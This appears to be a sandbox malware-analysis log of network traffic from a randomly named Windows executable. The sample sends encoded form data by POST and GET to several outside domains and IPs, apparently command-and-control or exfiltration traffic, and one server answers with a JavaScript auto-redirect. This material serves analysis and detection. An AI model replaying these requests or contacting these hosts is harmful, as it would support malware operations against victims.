                                                        Nov 28, 2024 09:27:55.792651892 CET495OUTGET /xxr1/?lJoLl=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM6p0xnMJwAYLU5sobd2jLDJzuKUg73Rt+wU2Ky2uHmf2o9wQ==&QjtpF=dVl4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.nb-shenshi.buzz
                                                        Connection: close
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Nov 28, 2024 09:27:57.078223944 CET1236INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 28 Nov 2024 08:27:56 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 2966
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        ETag: "66cd104a-b96"
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                        Nov 28, 2024 09:27:57.078383923 CET1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                        Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                                                        Nov 28, 2024 09:27:57.078397036 CET448INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                        Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
                                                        Nov 28, 2024 09:27:57.078900099 CET250INData Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                        Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.549780202.79.161.151802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:28:12.965143919 CET753OUTPOST /sgdd/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.laohub10.net
                                                        Origin: http://www.laohub10.net
                                                        Referer: http://www.laohub10.net/sgdd/
                                                        Cache-Control: no-cache
                                                        Content-Length: 206
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 49 37 52 5a 46 52 38 39 74 6b 4f 66 6c 37 49 6b 79 33 52 2f 6d 44 35 2f 75 48 6c 59 68 65 59 48 46 5a 56 50 77 67 3d
                                                        Data Ascii: lJoLl=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLeI7RZFR89tkOfl7Iky3R/mD5/uHlYheYHFZVPwg=
                                                        Nov 28, 2024 09:28:14.393183947 CET532INHTTP/1.1 200 OK
                                                        Server: Apache
                                                        Content-Type: text/html; charset=utf-8
                                                        Accept-Ranges: bytes
                                                        Cache-Control: max-age=86400
                                                        Age: 1
                                                        Connection: Close
                                                        Content-Length: 357
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                        Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.549786202.79.161.151802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:28:15.683224916 CET773OUTPOST /sgdd/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.laohub10.net
                                                        Origin: http://www.laohub10.net
                                                        Referer: http://www.laohub10.net/sgdd/
                                                        Cache-Control: no-cache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 76 42 76 39 50 53 4a 52 2f 78 64 6d 4a 6c 52 6e 30 2f 39 43 74 73 4c 54 67 79 44 58 34 77 30 62 6a 33 4c 6b 69 6d
                                                        Data Ascii: lJoLl=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGvBv9PSJR/xdmJlRn0/9CtsLTgyDX4w0bj3Lkim
                                                        Nov 28, 2024 09:28:17.019881010 CET532INHTTP/1.1 200 OK
                                                        Server: Apache
                                                        Content-Type: text/html; charset=utf-8
                                                        Accept-Ranges: bytes
                                                        Cache-Control: max-age=86400
                                                        Age: 1
                                                        Connection: Close
                                                        Content-Length: 357
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                        Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.549794202.79.161.151802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:28:18.435781956 CET1790OUTPOST /sgdd/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.laohub10.net
                                                        Origin: http://www.laohub10.net
                                                        Referer: http://www.laohub10.net/sgdd/
                                                        Cache-Control: no-cache
                                                        Content-Length: 1242
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 6f 52 48 6b 50 6e 6b 69 37 67 2f 56 6e 63 73 36 66 5a 49 6b 54 75 53 46 70 44 53 31 67 4a 34 79 74 46 46 46 59 67 46 48 31 41 31 4d 7a 33 47 55 66 57 2b 76 48 35 76 73 49 78 4e 2f 33 54 52 7a 4f 6a 6d 6c 59 32 6e 6f 5a 70 62 48 48 36 30 71 4d 31 54 76 6c 32 6d 4d 4a 2f 6c 49 61 68 6a 43 73 4c 65 5a 37 38 75 45 53 68 51 39 6c 44 2f 52 45 5a 43 5a 64 4e 50 2b 37 42 36 56 4c 59 58 62 34 49 2f 42 61 55 43 6c 2f 73 4a 45 74 43 78 6e 32 4d 57 54 31 32 76 74 31 35 38 75 4e 6b 53 52 52 73 [TRUNCATED]
                                                        Data Ascii: lJoLl=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8coRHkPnki7g/Vncs6fZIkTuSFpDS1gJ4ytFFFYgFH1A1Mz3GUfW+vH5vsIxN/3TRzOjmlY2noZpbHH60qM1Tvl2mMJ/lIahjCsLeZ78uEShQ9lD/REZCZdNP+7B6VLYXb4I/BaUCl/sJEtCxn2MWT12vt158uNkSRRsoDIuAYXTHq8wi+RtikKYlVcAFtdIfvl3K2pKNWTnEw8UcY4VhS0CYy7OlshfHgArW9u4saxfYEKBbc9n+UlZzl3mZ6c3wevJrxqZgoRFA04gm1Lq+xn/RaedHbT4+jMvRqIj0gQhTgfref3qPNVZoKE8RdZmqmtZYwoo+3xF7I1a/BTUuqVqvh61ELnjKhMBcjQQ6JE3344lsbtITU7FM9TEjdxqT3H0s/f4Benr9NgUPZ8E1yMLVw4iMy1jg2NiStxDnt8PGk6kS6uVzmJTxBOhVpnzhwuWwwq6vd5zX1lVfxKdZ/u8aWtE/ZphNFh1sCkSo/rBVMkz+EByqc0TxDWJ877BINu2LcnazhVVBFH0Ewz7okuSX+E9e8YbRqps3DMIkJrTvj0oIMHp+zWIrxUufzCDmyt1M2kSuj4I4u8xdwYJC41pdAYJeSazwzTOJPiGqzo2j3cXG2ZKy6TIbSSKhM3tbU+6zlAne1Ax99qubVdwrhgtgiVkbdg2q6EXo8En537nS3T9mliEG9WkYuxayMcDPRWRa/+exIgIonKkQQp4doQMwmnVFD/Mvh9K/YlYMbNQhH1yKQlhU8JPXVZsPZuGS+KZlGMnt8Z3aw2Li4r30ib9JsxrMS8FaX64cKWPUBqULBvyeSunxvkxleTyd/RSAilAqy [TRUNCATED]
                                                        Nov 28, 2024 09:28:19.791860104 CET532INHTTP/1.1 200 OK
                                                        Server: Apache
                                                        Content-Type: text/html; charset=utf-8
                                                        Accept-Ranges: bytes
                                                        Cache-Control: max-age=86400
                                                        Age: 1
                                                        Connection: Close
                                                        Content-Length: 357
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                        Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.549802202.79.161.151802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:28:21.097902060 CET492OUTGET /sgdd/?lJoLl=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZBzCxFQdAjqxC7xOHDVFXExJKDlpbRou5GO9qXsjFJuvZOA==&QjtpF=dVl4 HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.laohub10.net
                                                        Connection: close
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Nov 28, 2024 09:28:22.468275070 CET532INHTTP/1.1 200 OK
                                                        Server: Apache
                                                        Content-Type: text/html; charset=utf-8
                                                        Accept-Ranges: bytes
                                                        Cache-Control: max-age=86400
                                                        Age: 1
                                                        Connection: Close
                                                        Content-Length: 357
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 [TRUNCATED]
                                                        Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.549819149.88.81.190802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:28:28.853509903 CET747OUTPOST /rq1s/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.xcvbj.asia
                                                        Origin: http://www.xcvbj.asia
                                                        Referer: http://www.xcvbj.asia/rq1s/
                                                        Cache-Control: no-cache
                                                        Content-Length: 206
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 56 48 45 4f 6b 76 67 2b 6e 6d 73 76 6d 4e 52 31 51 61 57 4e 73 33 33 4a 37 34 74 58 69 6f 37 67 4b 49 38 4f 41 51 3d
                                                        Data Ascii: lJoLl=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJVHEOkvg+nmsvmNR1QaWNs33J74tXio7gKI8OAQ=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.549827149.88.81.190802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:28:31.522336006 CET767OUTPOST /rq1s/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.xcvbj.asia
                                                        Origin: http://www.xcvbj.asia
                                                        Referer: http://www.xcvbj.asia/rq1s/
                                                        Cache-Control: no-cache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
